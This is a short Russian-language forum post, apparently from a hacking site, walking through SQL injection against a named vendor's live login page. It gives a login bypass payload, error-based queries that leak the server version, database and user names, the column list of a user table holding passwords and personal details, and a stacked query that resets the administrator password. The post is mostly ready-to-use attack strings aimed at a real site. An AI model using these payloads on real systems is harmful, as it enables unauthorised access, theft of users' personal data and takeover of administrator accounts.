Тестим на сайте производителя! www.irola.com _http://www.irola.com/mytime35/login.asp 1. Обход авторизации: В поля ввода логин и пасс: Code: 1' or 1=1-- 2. Смотрим системные переменные: Code: 1' or 1=convert(int,@@version)-- 1' or 1=convert(int,@@servername)-- 1' or 1=convert(int,db_name())-- 1' or 1=convert(int,user_name())-- 1' or 1=convert(int,system_user)-- 3. Таблицы: Code: UserInfo.UserID UserInfo.Login UserInfo.Password UserInfo.UserNumber UserInfo.FirstName UserInfo.LastName UserInfo.TeamID UserInfo.Address UserInfo.City UserInfo.ZipCode UserInfo.CountryID UserInfo.Phone 4. Меняем админский пароль: Code: -1' UPDATE UserInfo set Password= '1234' Where(UserID= '1');-- aria-security.net
